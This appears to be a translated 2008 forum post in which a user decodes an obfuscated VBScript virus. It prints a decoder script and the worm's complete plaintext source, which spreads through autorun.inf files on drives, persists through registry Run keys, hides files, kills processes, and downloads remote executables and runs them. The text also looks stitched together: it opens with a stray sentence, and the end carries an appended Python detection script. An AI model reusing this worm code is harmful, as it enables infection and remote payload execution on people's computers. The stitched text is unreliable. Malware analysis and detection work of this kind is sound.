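Because nothing is passed to a script host, this can be run on any analysis machine against a saved copy of the decoded text.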
Floor 22 Posted 2008-01-20 12:48 · China, Beijing, Unicom
Silver Member
UID 87277
Insane encryption... (sweat)....
The poster above has worked hard
Floor 23 Posted 2008-01-23 19:38 · China, Beijing, Haidian District, Unicom
Junior User
UID 107997
【Continuation Seven】Let's carry this matter through to the end. Although the viewers have all scattered and no one is reading this post, I'm writing for myself now. I use this nice page layout here, and after writing, I'll copy the web page to keep as a reference for myself. As mentioned above, I need to decode the encrypted virus and restore it to a complete program. The following is my method (there are many methods, different people have different views):


'**************The following variable assignments come from Decode_6. It's equivalent to the ciphertext.

on error resume next
dyz="ire=|9|:ogw=700:if=|.iof|:ir=|.ior|:pz=|%pbzfcrp% /p |:qsb=|/h#g/|:gvy=|UT |&ire:vas=|\nhgbeha.vas|}{frg jf=perngrbowrpg(|jfpevcg.furyy|):frg jzv=trgbowrpg(|jvaztzgf:\\.\ebbg\pvzi2|)}{frg sfb=perngrbowrpg(|fpevcgvat.svyrflfgrzbowrpg|):frg fvf=jzv.rkrpdhrel(|fryrpg * sebz jva32_bcrengvatflfgrz|)}{frg qp=sfb.qevirf:bhj=jfpevcg.fpevcgshyyanzr:jva=sfb.trgfcrpvnysbyqre(0)&w:qve=sfb.trgfcrpvnysbyqre(1)&w}{gzc=sfb.trgfcrpvnysbyqre(2)&w:jor=qve&|jorz\|:zve=yrsg(bhj,yra(bhj)-yra(jfpevcg.fpevcganzr))}{jfe=|perngrbowrpg(||jfpevcg.furyy||).eha|:pae=|\pbzchgreanzr|:pac=|HKLM\flfgrz\pheeragpbagebyfrg\pbageby|&pae&pae&pae}{pan=ee(pac,0):vs pan=|| gura pan=gvy}{ecn=|HKLM\fbsgjner\|&pan&w:ebc=|\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\rkcybere\|}{fs=|furyy sbyqref\|:sfc=ee(|HKLM|&ebc&fs&|pbzzba fgneghc|,0)&w&if:snc=ee(|HKCU|&ebc&fs&|snibevgrf|,0)&w}{qnc=ee(|HKCU|&ebc&fs&|qrfxgbc|,0)&w:efa=pan:ug=rp(|vijg?56|):un=rp(|:;9::<5xj9|):up=|0qjhEcE|:ur=rp(|p|+up)}{efc=|HKLM\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\cbyvpvrf\rkcybere\eha\|:vs zve=qve gura flf=gehr}{sbe rnpu fv va fvf:pn=fv.pncgvba:pf=fv.pbqrfrg:pp=fv.pbhagelpbqr:bf=fv.bfynathntr:ji=fv.irefvba:arkg}{uvc=|HKCU|&ebc&|nqinaprq\fubjfhcreuvqqra|:uo=|ii1<=676k|&pue(124)&|e;|}{vs vafge(ji,|5.2|)<>0 gura}{uq=|g|+up}{ryfrvs pp<>86 gura uq=|c|+up:ryfr uq=|$|+up:raq vs":gtz="gwf=ee(|gwf|,1):qwf=ee(|qwf|,1):vs abg vfahzrevp(gwf) be abg vfqngr(qwf) gura je |gwf|,1:je |qwf|,qngr:qwf=ee(|qwf|,1)}{je |gwf|,gwf+1:jo=ce(|pyfza.rkr|,1)=1 be ce(|nc.rkr|,1)=1 be ce(|chojva.rkr|,1)=1}{vs qngr-pqngr(qwf)>4 gura td=gehr:jf.eha |arg fgneg ||gnfx fpurqhyre|||,0,snyfr}{vs (ee(|gwf|,1)>800 be jo be td be abg flf) naq ee(|qrq|,1)<>pfge(qngr) gura}{vq=ee(|vqq|,1):vs jo gura vq=1:wf=1:pq=0}{qb juvyr pq<>|<fpevcg>|}{vs wf=2 be wf=4 gura}{q2=qa(zve&gvy,ug+un+rp(uq)&vq,0,100):pq=eg(zve&gvy,1)}{ryfrvs wf=1 be wf=3 gura q1=qa(zve&gvy,ug+rp(uo)+rp(uq)&vq&|&i=|&ire,0,100):pq=eg(zve&gvy,1)}{raq vs:wf=wf+1:jm=q1=1 be q2=1:vs wf>4 gura}{vs jm gura tg=1}{rkvg 
qb}{raq vs}{vs jm gura re -1}{ybbc}{vs rv(zve&gvy,1) gura}{frg e=sfb.bcragrkgsvyr(zve&gvy,1)}{pva=e.ernqyvar:qvf=e.ernqyvar:qan=e.ernqyvar:qse=e.ernqyvar:air=e.ernqyvar:aeh=e.ernqyvar}{aan=e.ernqyvar:ase=e.ernqyvar:gfj=e.ernqyvar:gpb=e.ernqyvar:bfj=e.ernqyvar:vqq=e.ernqyvar}{e.pybfr:qs zve&gvy:vs pva=|<fpevcg>| gura}{je |gwf|,1:je |qwf|,qngr:je |vqq|,vqq:je |qan|,qan:je |gfj|,gfj:je |gpb|,gpb:je |bfj|,bfj}{vs air-ire>=1 be abg rv(qve&ir,1) gura qa qve&aan,ug&ase&qsb&aan,aeh,2000:jfpevcg.dhvg}{vs qvf=1 naq flf gura}{vs qan<>yr be abg rv(gzc&yr,1) gura qs gzc&yr:qa gzc&qan,ug&qse&qsb&qan,1,1000}{raq vs}{raq vs}{raq vs}{raq vs}{vs re(1) be jo gura tg=1":eiz="vs sfb.svyrrkvfgf(anzr) naq jg=1 gura rv=gehr}{vs sfb.sbyqrerkvfgf(anzr) naq jg=2 gura rv=gehr":dfz="ne ju,0}{vs rv(ju,1) gura sfb.qryrgrsvyr(ju)}{vs rv(ju,2) gura sfb.qryrgrsbyqre(ju)":fut=":function ":bfz="qs ju:frg ova=sfb.perngrgrkgsvyr(ju,gehr):ova.jevgryvar jg:ova.pybfr}{vs qn=1 gura ne ju,7}{vs abg re(0) gura os=1":biz="qs ju:frg v=sfb.perngrgrkgsvyr(ju,gehr):u=iopeys}{v.jevgryvar gvy&u&||&u&|bcra=jfpevcg.rkr .\|&if&u&|furyy\bcra\pbzznaq=jfpevcg.rkr .\|&if&u&|furyy\bcra\qrsnhyg=1|}{v.pybfr:ne ju,7:vs abg re(0) gura ov=1":rtz="vs yv<0 gura ju=bhj}{vs rv(ju,1) gura}{vs sfb.trgsvyr(ju).fvmr=0 gura}{eg=0}{ryfr}{frg e=sfb.bcragrkgsvyr(ju,1)}{frg py=sfb.bcragrkgsvyr(ju,1)}{py.ernqnyy}{gyv=py.yvar}{py.pybfr}{vs yv>0 naq yv<=gyv gura}{v=0 }{qb juvyr v<yv}{v=v+1}{vs abg e.ngraqbsfgernz gura}{fyv=e.ernqyvar}{ryfr}{fyv=0}{raq vs}{ybbc}{eg=fyv}{ryfrvs yv<=0 gura}{eg=e.ernqnyy}{ryfr}{eg=0}{raq vs}{e.pybfr}{raq vs}{ryfr}{eg=0}{raq vs":wrz="vs eqn=-1 gura jf.ertqryrgr ean ryfr jf.ertjevgr ecn&ean,eqn,|REG_SZ|":rrz="vs cn=1 gura ean=ecn&ean}{ee=jf.erternq(ean)}{vs re(0) gura ee=0":arz="vs rv(svyr,1) gura:frg bsvyr=sfb.trgsvyr(svyr):bsvyr.nggevohgrf=pt:frg bsvyr=abguvat}{vs rv(svyr,2) gura:frg bsvyr=sfb.trgsbyqre(svyr):bsvyr.nggevohgrf=pt:frg bsvyr=abguvat":eft=")):end function":dnz="ne ybp,0:frg kcbfg = 
perngrbowrpg(|zvpebfbsg.kzyuggc|):kcbfg.bcra |trg|,jro,0:kcbfg.fraq()}{vs zva<>0 gura}{vs abg re(0) gura}{qa=1:frg ftrg=perngrbowrpg(|nqbqo.fgernz|) }{ftrg.zbqr=3:ftrg.glcr=1:ftrg.bcra():ftrg.jevgr(kcbfg.erfcbafrobql):ftrg.fnirgbsvyr ybp,2}{ne ybp,7}{vs rv(ybp,1) gura sfm=sfb.trgsvyr(ybp).fvmr ryfr sfm=0}{vs sfm>zva gura}{vs evf=1 gura jf.eha ybp}{ryfr}{qa=0:qs ybp}{raq vs}{raq vs}{raq vs":prz="frg cy=jzv.rkrpdhrel(|fryrpg * sebz jva32_cebprff jurer anzr='|&cpf&|'|):v=1}{sbe rnpu c va cy:v=v+1}{vs v>nof(tf) gura ce=1}{vs tf<0 gura vs c.grezvangr=2 naq ce=1 gura jf.eha pz&|gfxvyy |&yrsg(c.anzr,yra(c.anzr)-4),0,snyfr}{arkg}{vs re(0) gura ce=2":ecz="sbe v=1 gb yra(jg):rp=rp+pue(nfp(zvq(jg,v,1))-v):arkg":l="d=125:f=123:j=124:h=97:m=109:r=13:k=110:n=122:s=-13:u=0:v=0:":zcx="sbe rnpu q va qp}{vs zve=q&w gura jf.eha |rkcybere |&q,3,snyfr}{arkg}{bhp=eg(bhj,-1):vs ps(bhj) gura zftobk(|Hnccl Nrjlrne!|):xz 1}{vs flf gura}{uv 1}{vs ee(|gvy|,1)<>gvy gura}{je |gvy|,gvy}{je |gwf|,ogw}{je |qwf|,qngr}{je |qrq|,0}{raq vs}{vs ee(|ngq|,1)=1 gura jf.eha |ng /q /l|,0,snyfr:je |ngq|,0}{vs ee(efc&efa,0)=ir gura ef -1}{yr=ee(|qan|,1):vs rv(gzc&yr,1) gura jf.eha gzc&yr}{xz 0}{ph:re 1}{jfpevcg.fyrrc 1000}{vs ee(|qrq|,1)<>pfge(qngr) gura jf.eha bhj}{ryfr}{jfpevcg.fyrrc 5000}{vs ce(|jfpevcg.rkr|,2)=2 gura}{vs ee(|gwp|,1)=pfge(qngr) gura:jfpevcg.dhvg:ryfr:je |gwp|,qngr}{raq vs}{vs ce(|jfpevcg.rkr|,2)=1 gura jfpevcg.dhvg}{ne bhj,7:pb qve&ir:pb jva&ir:ef 1:jf.eha qve&ir}{raq vs":aft=eft&fut:coz="qs ju:frg iof=sfb.perngrgrkgsvyr(ju,gehr):iof.jevgr bhp:iof.pybfr:ne ju,7":rn="dim d:j=""\"":on error resume next":rsz="vs fj=1 naq ee(efc&efa,0)<>ir gura}{jf.ertjevgr efc&efa,ir,|REG_SZ|}{vs re(0) naq abg rv(sfc,1) gura os sfc,jfe&| |||&ir&||||,0}{ryfrvs fj=-1 gura:qs sfc}{ryfrvs fj=0 gura:qs sfc:je efc&efa,-1:je ecn,-1}{raq vs":hiz="vs fj=1 gura jf.ertjevgr uvc,|0|,|REG_DWORD|}{vs fj=0 gura uv=ee(uvc,0)":giz="vq=ee(|vqq|,1)}{qb juvyr 
svq<=rvq:vqp=vqp&|,|&svq:svq=svq+1:ybbc}{vqf=vqf&vqp:vqff=fcyvg(vqf,|,|)}{sbe v=0 gb hobhaq(vqff)}{vs vq=vqff(v) gura vs abg rv(gzc&sanzr,1) gura qa gzc&sanzr,ug&shey,0,2000}{arkg}{vs rv(gzc&sanzr,1) gura jf.eha gzc&sanzr}{tv=1":dwz="vs ee(|trq|,1)<>sa naq ce(cpf,1)=1 gura}{vs qa(gzc&sa,ug&shey,0,2000)=1 gura qjp=1}{vs rv(gzc&sa,1) naq qjp=1 gura}{vs xvyy=1 gura ce cpf,-1}{jf.eha gzc&sa}{vs abg re(0) gura je |trq|,sa:qa 0,ug+rp(uo)+ur+sa,0,0:vs xvyy=2 gura ce cpf,-1:xz 1}{raq vs}{qj=1}{raq vs}{jfpevcg.fyrrc 100":usz="sbe rnpu q va qp}{vs q.qevirglcr=3 be (q.qevirglcr=1 naq q<>|A:| naq q<> |B:|) gura}{vs fj=1 gura}{vs rv(q&vas,2) gura qs q&vas}{vs rv(q&w&if,1) naq rv(q&vas,1) gura}{vs eg(q&vas,1)<>gvy gura ov q&vas}{ryfr}{uv 1:ov q&vas:pb q&w&if}{raq vs}{ryfrvs fj=-1 gura:qs q&vas:qs q&w&if}{ryfr:os q&w&if,jfe&|(yrsg(jfpevcg.fpevcgshyyanzr,3)),3|&fgevat(10000,|'|),1:qs q&vas}{raq vs}{raq vs}{arkg":cuz="phf=ee(|bfj|,1)<>4}{qb}{qph=ee(|gtf|,1)<>pfge(qngr)}{vs (frpbaq(gvzr) zbq 3)=0 gura}{vs qph naq phf gura hf 1}{zva=zvahgr(abj):vs (zva zbq 2)=0 naq aa<>zva naq bb<>1 gura aa=zva:bb=tg:xz 0}{vs ee(|gfj|,1)=1 gura rkrphgr(hp(ee(|gpb|,1)))}{raq vs}{jfpevcg.fyrrc 900}{vs uv(0)=1 naq qph gura je |gtf|,qngr:hf -1}{vs ce(|gnfxzte.rkr|,1)=1 gura:jf.eha |ng |&gvzr+0.003&| /vagrenpgvir |&ir,0,snyfr:je |ngq|,1:uv 1:jfpevcg.dhvg}{ybbc":ext=":execute(uc(":kmz="vs fj=1 gura}{ef 0:hf -1:qs bhj:qs jva&ir:qs qve&ir:qs jor&ir:jfpevcg.dhvg}{ryfr}{ef 1}{vs ps(qve&ir) gura pb qve&ir}{vs ps(jva&ir) gura pb jva&ir}{raq vs":cfz="vs eg(ju,1)<>|'|&ire gura ps=gehr"


'**************The following SourceStr assigns the string which is the content of Decode_7. This is a freeze frame before the virus program is about to expand and execute.
SourceStr=":execute(uc(dyz)):execute(uc(zcx)):function gt():execute(uc(gtz)):end function:function ei(name,wt):execute(uc(eiz)):end function:function df(wh):execute(uc(dfz)):end function:function bf(wh,wt,da):execute(uc(bfz)):end function:function bi(wh):execute(uc(biz)):end function:function rt(wh,li):execute(uc(rtz)):end function:function wr(rna,rda):execute(uc(wrz)):end function:function rr(rna,pa):execute(uc(rrz)):end function:function ar(file,cg):execute(uc(arz)):end function:function dn(loc,web,ris,min):execute(uc(dnz)):end function:function pr(pcs,gs):execute(uc(prz)):end function:function ec(wt):execute(uc(ecz)):end function:function co(wh):execute(uc(coz)):end function:function rs(sw):execute(uc(rsz)):end function:function hi(sw):execute(uc(hiz)):end function:function gi(ids,fid,eid,fname,furl):execute(uc(giz)):end function:function dw(pcs,fn,furl,kill):execute(uc(dwz)):end function:function us(sw):execute(uc(usz)):end function:function cu():execute(uc(cuz)):end function:function km(sw):execute(uc(kmz)):end function:function cf(wh):execute(uc(cfz)):end function"
'**************The above SourceStr assigns the string which comes from the result of Decode_7. This is a freeze frame before the virus program is about to expand and execute.


'**************Start organizing and rewriting the function uc(b)
Function uc(b)

'<><><><>The following variable assignments come from the first Decode_4, which is equivalent to the key.
c=vbcrlf:d=127:f=11:j=12:h=14:m=31:r=83:k=1:n=8:s=114:u=-5:v=5
i="if a=":t=" then ":e="elseif a>=":a=" and a<=":g="a=a+":o=t&c&g:p=c&e:q=c&i
'<><><><>Must be placed inside the function, otherwise it will be mistakenly modified by the process outside the function. Remember!

execute(l&"for ii=1 to len(b):a=asc(mid(b,ii,1))"&q&"d"&t&"a=13"&q&"f"&t&"a=10"&q&"j"&t&c&"a=34"&c&e&"h"&a&"m"&o&"r"&p&"k"&a&"n"&o&"s"&p&"53"&a&"57"&o&"u"&p&"48"&a&"52"&o&"v"&c&"end if"&c&"uc=uc+chr(a)"&c&"next"&c&"uc=rn+c+uc")
End Function
'**************Organizing and rewriting the function uc(b) ends


'**************The following starts restoring the pathogen program
ForAppending=8
Create=True
ASCII=0
OutPutFile="Virus.txt" ' Output file name
Decode="" ' The decoded text is stored here each time
WhichOne="" ' Show which uc(…) has just been decoded

Set objWSH=CreateObject("WScript.Shell")
Set objFSO=CreateObject("Scripting.FileSystemObject")
Set objTXT=objFSO.OpenTextFile(OutPutFile,ForAppending,Create,ASCII)

objTXT.Write Title
AddBlankLine=True ' Determine whether to add 2 blank lines for readability

SourceArr=Split(SourceStr,":")
For LineNum=0 To UBound(SourceArr)
If InStr(1,SourceArr(LineNum),"execute",1)=1 Then
WhichOne=Mid(SourceArr(LineNum),Instr(1,SourceArr(LineNum),"uc",1),InStrRev(SourceArr(LineNum),")",-1,1)-Instr(1,SourceArr(LineNum),"uc",1)) ' Get the name of uc(...), just for easy observation. Here, it's a rough interception of the string. The method is definitely not as convenient as using regular expressions, just make do with it.
Execute(Replace(SourceArr(LineNum),"execute","Intercept")) ' The key here is to use Intercept to substitute the virus's execute function, and then execution will only decode but not run
If AddBlankLine AND True Then ' Judge whether to add blank lines
objTXT.WriteBlankLines 2
End If
AddBlankLine=True ' It's recommended to add blank lines before and after execute, of course, whether to add specific ones depends on what follows
objTXT.WriteLine Decode
End If
If InStr(1,SourceArr(LineNum),"function",1)=1 Then
objTXT.WriteBlankLines 2
AddBlankLine=False ' Add before but not after function
objTXT.WriteLine SourceArr(LineNum)
End If
If InStr(1,SourceArr(LineNum),"end",1)=1 Then
AddBlankLine=True ' Add before but not after end function
objTXT.WriteLine SourceArr(LineNum)
End If
Next

objTXT.Close
objWSH.Run OutPutFile
WScript.Quit

'**************Print the document header
Function Title()
Title="'" & String(40,"=") & vbCrLf
Title=Title & "'|" & Space(38) & "|" & vbCrLf
Title=Title & "'|" & Space(12) & "Virus Source Code" & Space(12) & "|" & vbCrLf
Title=Title & "'|" & Space(38) & "|" & vbCrLf
Title=Title & "'" & String(40,"=") & vbCrLf
End Function

'**************Intercept the code inside execute(), that is, the return value of uc(b)
Function Intercept(ByRef code)
Decode=code ' Transfer the decoded code to the Decode variable
objWSH.PopUp Decode,5,WhichOne & " decoding result, closes automatically after 5 seconds",64 ' Display the decoding result of each uc(...) and close automatically. You can comment out this line with ' in front if you find it annoying
End Function


I don't know why I can't upload the attachment. Just copy the above code, save it as, for example, uncover.vbs, and then run it. Please rest assured that it won't trigger a virus. This is also the reason why this post was just published, because I don't want to do things like recall. ^_^

The result is saved in virus.txt, which is the source program of the virus. Oh no, wait a minute, I forgot. In the sixth installment earlier, there is a function in Decode_6 that looks like an error handling function. I checked the plaintext of the virus and found that it uses that error handling function several times, which is quite strange. So the final result also needs that error handling function, function er(sco), added to Virus.txt. Therefore, the complete result is:

'========================================
'| |
'| Virus Source Code |
'| |
'========================================


dim d:j="\":on error resume next
ver="9":btj=700:vs=".vbs":ve=".vbe":cm="%comspec% /c ":dfo="/u#t/":til="UT "&ver:inf="\autorun.inf"
set ws=createobject("wscript.shell"):set wmi=getobject("winmgmts:\\.\root\cimv2")
set fso=createobject("scripting.filesystemobject"):set sis=wmi.execquery("select * from win32_operatingsystem")
set dc=fso.drives:ouw=wscript.scriptfullname:win=fso.getspecialfolder(0)&j:dir=fso.getspecialfolder(1)&j
tmp=fso.getspecialfolder(2)&j:wbe=dir&"wbem\":mir=left(ouw,len(ouw)-len(wscript.scriptname))
wsr="createobject(""wscript.shell"").run":cnr="\computername":cnp="HKLM\system\currentcontrolset\control"&cnr&cnr&cnr
cna=rr(cnp,0):if cna="" then cna=til
rpa="HKLM\software\"&cna&j:rop="\software\microsoft\windows\currentversion\explorer\"
sf="shell folders\":fsp=rr("HKLM"&rop&sf&"common startup",0)&j&vs:fap=rr("HKCU"&rop&sf&"favorites",0)&j
dap=rr("HKCU"&rop&sf&"desktop",0)&j:rsn=cna:ht=ec("ivwt?56"):ha=ec(":;9::<5kw9"):hc="0dwuEpE":he=ec("c"+hc)
rsp="HKLM\software\microsoft\windows\currentversion\policies\explorer\run\":if mir=dir then sys=true
for each si in sis:ca=si.caption:cs=si.codeset:cc=si.countrycode:os=si.oslanguage:wv=si.version:next
hip="HKCU"&rop&"advanced\showsuperhidden":hb="vv1<=676x"&chr(124)&"r;"
if instr(wv,"5.2")<>0 then
hd="t"+hc
elseif cc<>86 then hd="p"+hc:else hd="$"+hc:end if


dim d:j="\":on error resume next
for each d in dc
if mir=d&j then ws.run "explorer "&d,3,false
next
ouc=rt(ouw,-1):if cf(ouw) then msgbox("Happy Newyear!"):km 1
if sys then
hi 1
if rr("til",1)<>til then
wr "til",til
wr "tjs",btj
wr "djs",date
wr "ded",0
end if
if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0
if rr(rsp&rsn,0)=ve then rs -1
le=rr("dna",1):if ei(tmp&le,1) then ws.run tmp&le
km 0
cu:er 1
wscript.sleep 1000
if rr("ded",1)<>cstr(date) then ws.run ouw
else
wscript.sleep 5000
if pr("wscript.exe",2)=2 then
if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",date
end if
if pr("wscript.exe",2)=1 then wscript.quit
ar ouw,7:co dir&ve:co win&ve:rs 1:ws.run dir&ve
end if


function gt()
dim d:j="\":on error resume next
tjs=rr("tjs",1):djs=rr("djs",1):if not isnumeric(tjs) or not isdate(djs) then wr "tjs",1:wr "djs",date:djs=rr("djs",1)
wr "tjs",tjs+1:wb=pr("clsmn.exe",1)=1 or pr("ap.exe",1)=1 or pr("pubwin.exe",1)=1
if date-cdate(djs)>4 then gq=true:ws.run "net start ""task scheduler""",0,false
if (rr("tjs",1)>800 or wb or gq or not sys) and rr("ded",1)<>cstr(date) then
id=rr("idd",1):if wb then id=1:js=1:cd=0
do while cd<>"<script>"
if js=2 or js=4 then
d2=dn(mir&til,ht+ha+ec(hd)&id,0,100):cd=rt(mir&til,1)
elseif js=1 or js=3 then d1=dn(mir&til,ht+ec(hb)+ec(hd)&id&"&v="&ver,0,100):cd=rt(mir&til,1)
end if:js=js+1:wz=d1=1 or d2=1:if js>4 then
if wz then gt=1
exit do
end if
if wz then er -1
loop
if ei(mir&til,1) then
set r=fso.opentextfile(mir&til,1)
cin=r.readline:dis=r.readline:dna=r.readline:dfr=r.readline:nve=r.readline:nru=r.readline
nna=r.readline:nfr=r.readline:tsw=r.readline:tco=r.readline:osw=r.readline:idd=r.readline
r.close:df mir&til:if cin="<script>" then
wr "tjs",1:wr "djs",date:wr "idd",idd:wr "dna",dna:wr "tsw",tsw:wr "tco",tco:wr "osw",osw
if nve-ver>=1 or not ei(dir&ve,1) then dn dir&nna,ht&nfr&dfo&nna,nru,2000:wscript.quit
if dis=1 and sys then
if dna<>le or not ei(tmp&le,1) then df tmp&le:dn tmp&dna,ht&dfr&dfo&dna,1,1000
end if
end if
end if
end if
if er(1) or wb then gt=1
end function


function ei(name,wt)
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
end function


function df(wh)
dim d:j="\":on error resume next
ar wh,0
if ei(wh,1) then fso.deletefile(wh)
if ei(wh,2) then fso.deletefolder(wh)
end function


function bf(wh,wt,da)
dim d:j="\":on error resume next
df wh:set bin=fso.createtextfile(wh,true):bin.writeline wt:bin.close
if da=1 then ar wh,7
if not er(0) then bf=1
end function


function bi(wh)
dim d:j="\":on error resume next
df wh:set i=fso.createtextfile(wh,true):h=vbcrlf
i.writeline til&h&""&h&"open=wscript.exe .\"&vs&h&"shell\open\command=wscript.exe .\"&vs&h&"shell\open\default=1"
i.close:ar wh,7:if not er(0) then bi=1
end function


function rt(wh,li)
dim d:j="\":on error resume next
if li<0 then wh=ouw
if ei(wh,1) then
if fso.getfile(wh).size=0 then
rt=0
else
set r=fso.opentextfile(wh,1)
set cl=fso.opentextfile(wh,1)
cl.readall
tli=cl.line
cl.close
if li>0 and li<=tli then
i=0
do while i<li
i=i+1
if not r.atendofstream then
sli=r.readline
else
sli=0
end if
loop
rt=sli
elseif li<=0 then
rt=r.readall
else
rt=0
end if
r.close
end if
else
rt=0
end if
end function


function wr(rna,rda)
dim d:j="\":on error resume next
if rda=-1 then ws.regdelete rna else ws.regwrite rpa&rna,rda,"REG_SZ"
end function


function rr(rna,pa)
dim d:j="\":on error resume next
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0
end function


function ar(file,cg)
dim d:j="\":on error resume next
if ei(file,1) then:set ofile=fso.getfile(file):ofile.attributes=cg:set ofile=nothing
if ei(file,2) then:set ofile=fso.getfolder(file):ofile.attributes=cg:set ofile=nothing
end function


function dn(loc,web,ris,min)
dim d:j="\":on error resume next
ar loc,0:set xpost = createobject("microsoft.xmlhttp"):xpost.open "get",web,0:xpost.send()
if min<>0 then
if not er(0) then
dn=1:set sget=createobject("adodb.stream")
sget.mode=3:sget.type=1:sget.open():sget.write(xpost.responsebody):sget.savetofile loc,2
ar loc,7
if ei(loc,1) then fsz=fso.getfile(loc).size else fsz=0
if fsz>min then
if ris=1 then ws.run loc
else
dn=0:df loc
end if
end if
end if
end function


function pr(pcs,gs)
dim d:j="\":on error resume next
set pl=wmi.execquery("select * from win32_process where name='"&pcs&"'"):i=1
for each p in pl:i=i+1
if i>abs(gs) then pr=1
if gs<0 then if p.terminate=2 and pr=1 then ws.run cm&"tskill "&left(p.name,len(p.name)-4),0,false
next
if er(0) then pr=2
end function


function ec(wt)
dim d:j="\":on error resume next
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
end function


function co(wh)
dim d:j="\":on error resume next
df wh:set vbs=fso.createtextfile(wh,true):vbs.write ouc:vbs.close:ar wh,7
end function


function rs(sw)
dim d:j="\":on error resume next
if sw=1 and rr(rsp&rsn,0)<>ve then
ws.regwrite rsp&rsn,ve,"REG_SZ"
if er(0) and not ei(fsp,1) then bf fsp,wsr&" """&ve&"""",0
elseif sw=-1 then:df fsp
elseif sw=0 then:df fsp:wr rsp&rsn,-1:wr rpa,-1
end if
end function


function hi(sw)
dim d:j="\":on error resume next
if sw=1 then ws.regwrite hip,"0","REG_DWORD"
if sw=0 then hi=rr(hip,0)
end function


function gi(ids,fid,eid,fname,furl)
dim d:j="\":on error resume next
id=rr("idd",1)
do while fid<=eid:idc=idc&","&fid:fid=fid+1:loop
ids=ids&idc:idss=split(ids,",")
for i=0 to ubound(idss)
if id=idss(i) then if not ei(tmp&fname,1) then dn tmp&fname,ht&furl,0,2000
next
if ei(tmp&fname,1) then ws.run tmp&fname
gi=1
end function


function dw(pcs,fn,furl,kill)
dim d:j="\":on error resume next
if rr("ged",1)<>fn and pr(pcs,1)=1 then
if dn(tmp&fn,ht&furl,0,2000)=1 then dwc=1
if ei(tmp&fn,1) and dwc=1 then
if kill=1 then pr pcs,-1
ws.run tmp&fn
if not er(0) then wr "ged",fn:dn 0,ht+ec(hb)+he+fn,0,0:if kill=2 then pr pcs,-1:km 1
end if
dw=1
end if
wscript.sleep 100
end function


function us(sw)
dim d:j="\":on error resume next
for each d in dc
if d.drivetype=3 or (d.drivetype=1 and d<>"A:" and d<> "B:") then
if sw=1 then
if ei(d&inf,2) then df d&inf
if ei(d&j&vs,1) and ei(d&inf,1) then
if rt(d&inf,1)<>til then bi d&inf
else
hi 1:bi d&inf:co d&j&vs
end if
elseif sw=-1 then:df d&inf:df d&j&vs
else:bf d&j&vs,wsr&"(left(wscript.scriptfullname,3)),3"&string(10000,"'"),1:df d&inf
end if
end if
next
end function


function cu()
dim d:j="\":on error resume next
cus=rr("osw",1)<>4
do
dcu=rr("tgs",1)<>cstr(date)
if (second(time) mod 3)=0 then
if dcu and cus then us 1
min=minute(now):if (min mod 2)=0 and nn<>min and oo<>1 then nn=min:oo=gt:km 0
if rr("tsw",1)=1 then execute(uc(rr("tco",1)))
end if
wscript.sleep 900
if hi(0)=1 and dcu then wr "tgs",date:us -1
if pr("taskmgr.exe",1)=1 then:ws.run "at "&time+0.003&" /interactive "&ve,0,false:wr "atd",1:hi 1:wscript.quit
loop
end function


function km(sw)
dim d:j="\":on error resume next
if sw=1 then
rs 0:us -1:df ouw:df win&ve:df dir&ve:df wbe&ve:wscript.quit
else
rs 1
if cf(dir&ve) then co dir&ve
if cf(win&ve) then co win&ve
end if
end function


function cf(wh)
dim d:j="\":on error resume next
if rt(wh,1)<>"'"&ver then cf=true
end function


function er(sco)
if err.number<>0 or sco<0 then
err.clear
er=true
if sco<>0 and rr("ded",1)<>cstr(date) then
wr "oer",rr("oer",1)+abs(sco)
if rr("oer",1)>100 then wr "ded",date:wr "oer",0
end if
end if
end function



If any expert is interested, please analyze it for us. I've done the previous work, and now it's your turn to show off?
Oh, I forgot to say, thank you to all the experts, viewers, and moderators for your guidance and points. I can't reply one by one, please forgive me. Actually, I'm still asking others' questions over there, and I haven't had time to thank them yet. I'm doing this here to be well-prepared for when someone helps me solve doubts in the future. Okay, everyone, see U in other places, bye-bye!!!
【End of the full text】

[ Last edited by uhnmki on 2008-1-26 at 07:10 AM ]
Recent Ratings for This Post (4 in total)
Rater Score Time
liuyun20 +1 2008-03-31 14:17
abcd +15 2008-03-31 15:01
everest79 +15 2008-10-07 21:07
Evangel +2 2009-11-13 13:38
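For readers triaging the decoded listing in the post above, a static capability map can be built without running the script. This is an added example, not code from the thread: `RULES`, `triage` and `ec_decode` are hypothetical names, the sample is a few lines copied from the listing, and `"ivwt"` is a constructed input (ASCII assumed).

```python
import re

# Capability tag -> lowercase substrings (all taken from the listing) that must ALL occur in one body.
RULES = {
    "download-to-disk": ("microsoft.xmlhttp", "adodb.stream", "savetofile"),
    "autorun-inf-launch": ("open=wscript.exe", "shell\\open\\command="),
    "process-kill": ("win32_process", ".terminate"),
    "registry-write": ("regwrite",),
    "dynamic-exec": ("execute(",),
    "scheduled-relaunch": ('ws.run "at ', "/interactive"),
}
FUNC_RE = re.compile(r"^function\s+(\w+)\s*\([^)]*\)(.*?)^end function\s*$",
                     re.I | re.M | re.S)

def triage(vbs_source):
    """Return {function name: sorted capability tags}; untagged functions are omitted."""
    report = {}
    for name, body in FUNC_RE.findall(vbs_source):
        low = body.lower()
        tags = sorted(t for t, subs in RULES.items() if all(s in low for s in subs))
        if tags:
            report[name] = tags
    return report

def ec_decode(text):
    """Python equivalent of the listing's ec(): char code minus 1-based position."""
    return "".join(chr(ord(c) - i) for i, c in enumerate(text, start=1))

# Constructed sample: abridged lines of four functions from the listing above.
SAMPLE = r'''
function bi(wh)
i.writeline til&h&""&h&"open=wscript.exe .\"&vs&h&"shell\open\command=wscript.exe .\"&vs&h&"shell\open\default=1"
end function
function dn(loc,web,ris,min)
ar loc,0:set xpost = createobject("microsoft.xmlhttp"):xpost.open "get",web,0:xpost.send()
dn=1:set sget=createobject("adodb.stream")
sget.mode=3:sget.type=1:sget.open():sget.write(xpost.responsebody):sget.savetofile loc,2
end function
function pr(pcs,gs)
set pl=wmi.execquery("select * from win32_process where name='"&pcs&"'"):i=1
if gs<0 then if p.terminate=2 and pr=1 then ws.run cm&"tskill "&left(p.name,len(p.name)-4),0,false
end function
function ei(name,wt)
if fso.fileexists(name) and wt=1 then ei=true
end function
'''

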